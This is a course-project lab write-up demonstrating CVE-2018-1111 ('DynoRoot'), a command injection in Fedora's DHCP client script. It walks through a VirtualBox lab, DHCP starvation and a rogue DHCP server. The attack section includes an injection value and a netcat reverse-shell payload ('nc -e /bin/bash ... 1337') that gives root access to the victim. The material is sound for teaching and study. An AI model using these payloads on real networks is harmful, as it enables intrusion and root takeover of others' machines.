DynoRoot CVE-2018-1111

Final project for the course Advanced Ethical Hacking at KTH, Stockholm

This project demonstrates a known vulnerability of Fedora and RedHat machines related to an unsafe client-side implementation of the Dynamic Host Configuration Protocol (DHCP). A rogue DHCP server can craft DHCP offers with a malicious payload that gets executed in a root shell on the victim machine.

The vulnerability is credited to Felix Wilhelm and is known as CVE-2018-1111 or "DynoRoot".

Table of contents:



The Dynamic Host Configuration Protocol (DHCP) is an often-overlooked component in networked systems. Its role is to allow the dynamic configuration of hosts machines that connect to an existing network. The most common use case is to assign an IP address to newly-connected hosts and to inform it of existing routes to access other networks. Additional options can be specified, for example the address of a local DNS server and the zone it serves, or the location of a boot file.

Let's analyze the 4-way protocol that is followed when a new host wants to join a network after connecting to it physically by means of an ethernet or wireless connection.

  1. The client, lacking an IP address, broadcasts a DISCOVER message to the network.
  2. A DHCP server in charge of that network replies with an OFFER, containing: IP address, network submask, router address, and other options.
  3. The client replies with a REQUEST, officially requesting to lease the IP address that was offered
  4. The server concludes the exchange with an ACK, indicating that the client is allowed to use the IP address for a specified amount of time.

After the initial exchange, the client can renew the lease by simply sending another REQUEST message. The server will check the existence of a lease with the client's IP and MAC address and reply with an ACK.

DHCP Session (figure from Wikimedia Commons, under CC BY-SA 4.0 license).

Some things to note:

  • A client can also skip the DISCOVER phase and immediately REQUEST an address. This is common in scenarios in which the client already connected to the network in the past and remembers the previous address. In this case, the server verifies the availability of the address and ACKs the request, or, in case the lease is not available, sends a NACK.
  • Upon disconnection, clients can send a RELEASE message to inform the server that the address is now available. However, this is not mandated by the protocol and the server will periodically recollect expired leases.
  • Each DHCP server manages a limited pool of IP addresses, once they are all assigned, the server will not be able to OFFER leases to new clients
  • Multiple DHCP servers can exist on the same network, if a client receives multiple OFFERs it will only accept one, the other servers will observe the broadcasted REQUEST and invalidate the offer.


The vulnerability is located in /etc/NetworkManager/dispatcher.d/11-dhclient, which is executed by the client to parse and set the options received over DHCP.

  • declare is a bash builtin that when used without arguments lists all declared variables
  • grep filters all DHCP-related variables
  • while read opt iterated over the DHCP variables one by one, performs some parsing and prints a line like export new_optionname=value for each option
  • the export statements are then evaluated by the shell through eval
eval "$(
  declare | LC_ALL=C grep '^DHCP4_[A-Z_]*=' | while read opt; do
    echo "export $optname=$optvalue"

Regular operation

In normal situations, the code would work just fine and parse the new DHCP options. As an example, the following code:

DHCP4_OPTION_TWO="bla bla"

declare | LC_ALL=C grep '^DHCP4_[A-Z_]*=' | while read opt; do
  echo "export $optname=$optvalue"

Will print these two export statements to be evaluated by eval:

export new_option_one=42
export new_option_two='bla bla'

Code injection

However, due to the unsafe eval, it is possible to inject bash commands:

DHCP4_OPTION_ONE="x'& echo Hacked! #"
DHCP4_OPTION_TWO='bla bla'

eval "$(                             
  declare | LC_ALL=C grep '^DHCP4_[A-Z_]*=' | while read opt; do
    echo "export $optname=$optvalue"

Will result in the evaluation of echo Hacked!:

[1] 1541



The minimal setup to demonstrate the exploit consists of just two machines: the victim machine running Fedora 28, and an attacker machine. In this setup, the attacker simply needs to offer a DHCP service and wait the victim's connection.

Minimal exploit setup.

A more realistic setup would place the machines on a private network, where a third machine, the gateway, is configured as the benign DHCP server and as the gateway to the outside internet. In this setup, the attacker has to prevent the victim from connecting to the legit DHCP server before hoping to perform the attack.

Private network setup with one gateway machine acting as DHCP, router and firewall.

In the following sections we will:

  1. Install VirtualBox
  2. Create 3 virtual machines: gateway, attacker, and victim
  3. Install the OS on the machines (users, network and SSH access)
  4. Configure the gateway to host the benign DHCP server for the virtual internal network supplied by VirtualBox
  5. Install the Python dependencies for the attack

To jump straight into action and skip the manual setup, it's possible to run the setup.sh script in the ansible folder, which will (almost) automatically create the virtual machines and configure them using Ansible Roles. Just make sure that Ansible and VirtualBox are installed before launching setup.sh.


Install VirtualBox

The following instructions are from the official installation guide.

Add this line to /etc/apt/sources.list:

deb [arch=amd64] 'https://download.virtualbox.org/virtualbox/debian' bionic contrib

Install virtualbox and the extension pack:

wget -q 'https://www.virtualbox.org/download/oracle_vbox_2016.asc' -O- | sudo apt-key add -
wget -q 'https://www.virtualbox.org/download/oracle_vbox.asc' -O- | sudo apt-key add -

sudo apt-get update
sudo apt-get -y install gcc make linux-headers-$(uname -r) dkms virtualbox-6.1

wget 'https://download.virtualbox.org/virtualbox/6.1.16/Oracle_VM_VirtualBox_Extension_Pack-6.1.16.vbox-extpack'
sudo VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-6.1.16.vbox-extpack
VBoxManage list extpacks

Install Ansible (optional)

From the official guide for Ubuntu:

sudo apt update
sudo apt install software-properties-common
sudo apt-add-repository --yes --update ppa:ansible/ansible
sudo apt install ansible

Common SSH setup

In this section we'll create the SSH credentials that we'll use to log in into the machines. Adding the host entries in the SSH config file will save us some typing later.

Create an SSH key with no passphrase:

ssh-keygen -f ~/.ssh/ethhack -t ed25519 -N ''

Add these entries to the SSH config (~/.ssh/config):

Host gateway.ethhack
  Port 6001
  User gateway   

Host victim.ethhack
  Port 6002
  User victim

Host attacker.ethhack
  Port 6003
  User attacker

Host *.ethhack
  LogLevel ERROR
  HostName localhost
  IdentityFile ~/.ssh/ethhack
  StrictHostKeyChecking no
  UserKnownHostsFile /dev/null

Gateway machine

This machine hosts the benign DHCP server that manages a pool of addresses on the internal network. It is based on Ubuntu Server 18.04 with the ISC DHCP package.

In a real scenario, this machine would also act as a router (iptables) and firewall (UFW Uncomplicated Firewall) between the machines on the network and the outside world. Possibly, it would also host a DNS server for some internal services (BIND9).

VM Creation

We will create the virtual machine using the command-line tools of VirtualBox, so that the process can be repeated as quickly as possible. Otherwise, it's possible to create the VM through the graphical interface by entering the same configuration.

Download the Ubuntu ISO:

wget 'https://ftp.lysator.liu.se/ubuntu-releases/18.04.5/ubuntu-18.04.5-live-server-amd64.iso'
md5sum --check << EOF
fcd77cd8aa585da4061655045f3f0511  ubuntu-18.04.5-live-server-amd64.iso

Create the VM:

  • Network interface 1 connected to the default NAT network of VirtualBox
  • Network interface 2 with connected to the intnet internal network
    (the "d" in the MAC address stands for DHCP)
  • Port forwarding from a 600x port on the host to the SSH port in the virtual machine

VBoxManage createvm --name "${VM_NAME}" --ostype Ubuntu_64 --register
VBoxManage modifyvm "${VM_NAME}" \
  --memory 2048 \
  --acpi on \
  --boot1 dvd \
  --nic1 nat \
  --nic2 'intnet' \
  --macaddress2 "${VM_MAC//:/}" \
  --natpf1 "guestssh,tcp,,${SSH_PORT},,22" \
  --audio none

VBoxManage createhd disk --filename "${VM_NAME}.vdi" --size 10000
VBoxManage storagectl "${VM_NAME}" --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 0 \
  --type hdd \
  --medium "${VM_NAME}.vdi"

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "$(realpath ubuntu-18.04.5-live-server-amd64.iso)"

If something goes wrong:

VBoxManage unregistervm "${VM_NAME}" --delete

OS Install

The first time we boot the machine we need a virtual desktop to follow the installation steps. We can start the virtual machine in headless more and use rdesktop-vrdp to connect. If VirtualBox is running on a desktop computer it might be easier to launch the virtual machine from the GUI, but this method will work even with a remote VirtualBox host.

VBoxHeadless --startvm "${VM_NAME}" --vrde on --vrdeproperty "TCP/Ports=${VRDE_PORT}" &
sleep 5
rdesktop-vrdp "localhost:${VRDE_PORT}"
kill %%

Configuration parameters for the installer:

  • Hostname gateway
  • User gateway
  • Password gat
  • Static IP on enp0s8
  • Enable SSH server

/> Installation screenshot: network configuration.

Installation screenshot: user creation.

After installation, shutdown, remove the iso and disable VRDE:

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "none"
VBoxManage modifyvm "${VM_NAME}" --vrde off

SSH Login

For ease of access we can install the SSH key created above into the gateway machine:

VBoxHeadless --startvm "${VM_NAME}" &
sleep 5
ssh-copy-id -i ~/.ssh/ethhack.pub gateway.ethhack
ssh gateway.ethhack

If for some reason the enp0s8 network interface was not configured during the installation, write this config to /etc/netplan/00-installer-config.yaml:

  version: 2
      dhcp4: yes
      dhcp4: no
      addresses :

And update the network configuration:

sudo netplan apply
ip addr show dev enp0s8

DHCP server

Install ISC DHCP:

sudo apt install -y isc-dhcp-server

To enable DHCP on the internal interface, let's edit /etc/default/isc-dhcp-server:

sudo sed 's/INTERFACESv4=""/INTERFACESv4="enp0s8"/' -i /etc/default/isc-dhcp-server

The configuration of the address pool managed by the DHCP goes to /etc/dhcp/dhcpd.conf:


default-lease-time 60;
max-lease-time 7200;

subnet netmask {

The chose default lease time of 1 minute is rather low, but it useful for demonstration purpose.

Restart service:

sudo systemctl restart isc-dhcp-server

DHCP events are logged to /var/log/syslog. We can highlight relevant entries with:

tail -f /var/log/syslog | grep --line-buffered 'dhcpd' | grep -E 'dhcpd|attacker|fedora|'

If we leave the gateway on during the installation of the other machines, they'll pick up the DHCP configuration automatically.


The attacker machine has no particular requirement, it needs to run Python in a Conda environment. We can reuse the ISO from Ubuntu Server 18.04 for simplicity.

VM Creation

Create the VM:

  • Network interface 1 connected to the default NAT network of VirtualBox
  • Network interface 2 with connected to the intnet internal network
    (the "a" in the MAC address stands for Attacker)
  • Port forwarding from a 600x port on the host to the SSH port in the virtual machine

VBoxManage createvm --name "${VM_NAME}" --ostype Ubuntu_64 --register
VBoxManage modifyvm "${VM_NAME}" \
  --memory 2048 \
  --acpi on \
  --boot1 dvd \
  --nic1 nat \
  --nic2 'intnet' \
  --macaddress2 "${VM_MAC//:/}" \
  --natpf1 "guestssh,tcp,,${SSH_PORT},,22" \
  --audio none

VBoxManage createhd disk --filename "${VM_NAME}.vdi" --size 10000
VBoxManage storagectl "${VM_NAME}" --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 0 \
  --type hdd \
  --medium "${VM_NAME}.vdi"

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "$(realpath ubuntu-18.04.5-live-server-amd64.iso)"

OS Install

The first time we boot the machine we need a virtual desktop to follow the installation steps. We can start the virtual machine in headless more and use rdesktop-vrdp to connect. If VirtualBox is running on a desktop computer it might be easier to launch the virtual machine from the GUI, but this method will work even with a remote VirtualBox host.

VBoxHeadless --startvm "${VM_NAME}" --vrde on --vrdeproperty "TCP/Ports=${VRDE_PORT}" &
sleep 5
rdesktop-vrdp "localhost:${VRDE_PORT}"
kill %%

Configuration parameters for the installer:

  • Hostname attacker
  • User attacker
  • Password att
  • Set enp0s8 to use DHCP
  • Enable SSH server

Installation screenshot: user creation.

After installation, shutdown, remove the iso and disable VRDE:

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "none"
VBoxManage modifyvm "${VM_NAME}" --vrde off

SSH Login

For ease of access we can install the SSH key created above into the attacker machine:

VBoxHeadless --startvm "${VM_NAME}" &
sleep 5
ssh-copy-id -i ~/.ssh/ethhack.pub attacker.ethhack
ssh attacker.ethhack

Software dependencies

The python attack scripts need to run as root to be able to craft low-level network packages using Scapy. For simplicity, we'll just install all dependencies using the root user.

Conda environment with Scapy:

sudo su
wget 'https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh'
chmod u+x Miniconda3-latest-Linux-x86_64.sh
./Miniconda3-latest-Linux-x86_64.sh -b -p ./miniconda
./miniconda/bin/conda init
source .bashrc

conda create -y -n dynoroot python=3.6
conda activate dynoroot
pip install 'scapy[complete]'

Next, we'll get the two attack scripts from GitHub:

  • DHCP starvation
    This script will flood the benign DHCP with fake requests, exhausting the pool of available addresses.
    git clone 'https://github.com/baldassarreFe/FEP3370-advanced-ethical-hacking'
  • Rogue DHCP
    Once the benign DHCP has ran out of addresses, this script will be ready to hand out DHCP offers embedded with the malicious parameter. This script is a modified version of the original CVE):
    git clone 'https://github.com/baldassarreFe/CVE-2018-1111' --branch 'feature/ignore-mac'

Fedora Victim

The victim machine is not configured in any particular way, it's just a Fedora 28 installation with a vulnerable NetworkManager.

VM Creation

Download the Fedora ISO:

wget 'https://archives.fedoraproject.org/pub/archive/fedora/linux/releases/28/Server/x86_64/iso/Fedora-Server-dvd-x86_64-28-1.1.iso'
md5sum --check << EOF
18740b445159c54d10bd887650e8d1d7  Fedora-Server-dvd-x86_64-28-1.1.iso

Create the VM:

  • Network interface 1 connected to the default NAT network of VirtualBox
  • Network interface 2 with connected to the intnet internal network
    (the "f" in the MAC address stands for Fedora)
  • Port forwarding from a 600x port on the host to the SSH port in the virtual machine

VBoxManage createvm --name "${VM_NAME}" --ostype Fedora_64 --register
VBoxManage modifyvm "${VM_NAME}" \
  --memory 2048 \
  --acpi on \
  --boot1 dvd \
  --nic1 nat \
  --nic2 'intnet' \
  --macaddress2 "${VM_MAC//:/}" \
  --natpf1 "guestssh,tcp,,${SSH_PORT},,22" \
  --audio none

VBoxManage createhd disk --filename "${VM_NAME}.vdi" --size 10000
VBoxManage storagectl "${VM_NAME}" --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 0 \
  --type hdd \
  --medium "${VM_NAME}.vdi"

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "$(realpath Fedora-Server-dvd-x86_64-28-1.1.iso)"

If something goes wrong:

VBoxManage unregistervm "${VM_NAME}" --delete

OS Install

The first time we boot the machine we need a virtual desktop to follow the installation steps. We can start the virtual machine in headless more and use rdesktop-vrdp to connect. If VirtualBox is running on a desktop computer it might be easier to launch the virtual machine from the GUI, but this method will work even with a remote VirtualBox host.

VBoxHeadless --startvm "${VM_NAME}" --vrde on --vrdeproperty "TCP/Ports=${VRDE_PORT}" &
sleep 12 # Fedora is slow...
rdesktop-vrdp "localhost:${VRDE_PORT}"
kill %%

Install config:

  • Hostname fedora
  • User victim
  • Password vic
  • Set enp0s8 to use DHCP
  • SSH server is enabled by default

Installation screenshot: network configuration.

Installation screenshot: user creation.

After installation, shutdown, remove the iso and disable VRDE:

VBoxManage storageattach "${VM_NAME}" \
  --storagectl "IDE Controller" \
  --port 0 \
  --device 1 \
  --type dvddrive \
  --medium "none"
VBoxManage modifyvm "${VM_NAME}" --vrde off

SSH Login

For ease of access we can install the SSH key created above into the victim machine:

VBoxHeadless --startvm "${VM_NAME}" &
sleep 5
ssh-copy-id -i ~/.ssh/ethhack.pub victim.ethhack
ssh victim.ethhack


Check that interface enp0s8 is using DHCP:

sudo nmcli device show enp0s8

If not, it can be configured using:

sudo nmcli connection down   enp0s8
sudo nmcli connection modify enp0s8 IPv4.method auto
sudo nmcli connection modify enp0s8 IPv4.address ''
sudo nmcli connection up     enp0s8

To revert to a static IP:

sudo nmcli connection down   enp0s8
sudo nmcli connection modify enp0s8 IPv4.address
sudo nmcli connection modify enp0s8 IPv4.method manual
sudo nmcli connection up     enp0s8

Performing the attack

The following steps, executed in order, will showcase the DHCP attack. We suggest setting up a terminal multiplexer like Byobu to facilitate jumping from one machine to the other.

Before the attack:

  1. Spin up the 3 virtual machines, which will automatically connect to the benign DHCP
  2. Disconnect the Fedora machine and clean up the DHCP lease files to simulate a fresh connection
  3. Restart the DHCP server to simulate a fresh connection

The attack itself consists in:

  1. Firing up a series of fake DHCP REQUESTs from the attacker to starve the benign DHCP server
  2. Starting the rogue DHCP server that will send the malicious OFFERs to the victim
  3. Reconnecting the Fedora machine and waiting for the NetworkManager to broadcas a DHCP DISCOVER
  4. Waiting for the reverse shell to connect

If anything happens, stop all relevant services and start over.


Clean up old DHCP leases and the ARP table, then restart the DHCP:

sudo systemctl stop isc-dhcp-server
sudo rm /var/lib/dhcp/dhcpd.leases*
sudo ip link set arp off dev enp0s8
sudo ip link set arp on dev enp0s8

sudo systemctl start isc-dhcp-server
tail -f /var/log/syslog | grep --line-buffered 'dhcpd' | grep -E 'dhcpd|attacker|fedora|'


Get a fresh DHCP lease:

sudo dhclient -r enp0s8
sudo dhclient -v enp0s8

Record DHCP traffic using tcpdump:

sudo ip link set enp0s8 promisc on
sudo tcpdump -i enp0s8 -w attack.pcap 'arp or icmp or port 67 or port 68'

Alternatively, VirtualBox can also record traffic:

VBoxManage modifyvm "attacker" --nictrace2 on --nictracefile2 capture.pcap
VBoxManage modifyvm "attacker" --nictrace2 off

Launch DHCP starvation (run as root):

sudo su && cd && conda activate dynoroot
python FEP3370-advanced-ethical-hacking/starver.py \
  --interface  enp0s8 \
  --pool-start \

Use netcat to listen for connections from the victim:

nc -v -l -p 1337

Launch attack (run as root):

sudo su && cd && conda activate dynoroot
MY_IP=$(ip -f inet addr show enp0s8 | awk '/inet / {print $2}' | cut -d'/' -f1)
MY_MAC=$(ip link show enp0s8 | awk '/link\/ether / {print $2}' | cut -d'/' -f1)
python CVE-2018-1111/main.py \
  -i enp0s8 \
  -s \
  -g \
  -d 'victim.net' \
  -m "${MY_MAC}" \
  -p "nc -e /bin/bash ${MY_IP} 1337"


Clean up old DHCP leases and reconnect:

sudo nmcli connection down enp0s8
sudo find /var/lib/NetworkManager -name 'dhclient-*-enp0s8.lease' -delete

sudo nmcli connection up enp0s8


Video capture

The following video demonstrates the execution of the attack following the steps above. In the video, it is possible to observe:

  1. The 4-way DHCP exchange betweent the gateway and the attacker
  2. The DHCP starvation attack, both in the console of the attacker and in the logs of the DHCP server (note the NACK due to the existing lease of the attacker)
  3. The "no free leases" message from the gateway when the victim broadcasts a DHCP DISCOVER
  4. The crafted DHCP messages of the rogue DHCP server offering
  5. The confirmation that netcat has received the reverse shell connection from
  6. The fake DNS options received by the victim, i.e. DNS address and domain victim.net
  7. The successful remote code execution of simple commands on the victim machine
  8. The DHCP RELEASE sent at the end of the attack

Traffic analysis

The capture file containing the trace of the attack can be analyzed in Wireshark. In the capture we can note:

  1. The 4-way DHCP exchange betweent the gateway and the attacker
  2. The DHCP starvation attack
  3. The DPCH exchange initiated by the victim and completed by the attacker
  4. The ARP who-has requests and replies when the victim connected to the netcat session on the attacker

Packet capture of the attack, the DHCP option related to the exploit is highlighted. The letters in the MAC addresses stand for: d DHCP server, a attacker, f Fedora victim

Future work

DynoRoot targets old Fedora and RedHat distributions, and has been patched in more recent releases. Therefore, the chances of performing this exploit in the wild are limited. Luckily, DHCP attacks are not limited to remote code execution: any type of crafted option will be accepted by the client regardless of the presence of the DynoRoot vulnerability. The simplest way to exploit this behavior is to advertise an attacker-controlled machine as the network gateway or as the DNS for a certain zone, thus allowing to monitor, inspect and re-route any further traffic.

Another interesting direction regards DHCP starvation attacks. The attack presented in this project relies on flooding the DHCP server with REQUESTS from spoofed MAC addresses, which isn't the definition of stealthiness. This blog post explores the possibility of performing starvation attacks without sending a single DHCP packet but relying instead of spoofed ARP replies.


CVE-2018-1111 was reported to Red Hat by Felix Wilhelm from the Google Security Team.

The python script for performing the exploit is from Kevin Kirsche's GitHub repository with slight modifications to ignore the attacker's own MAC address.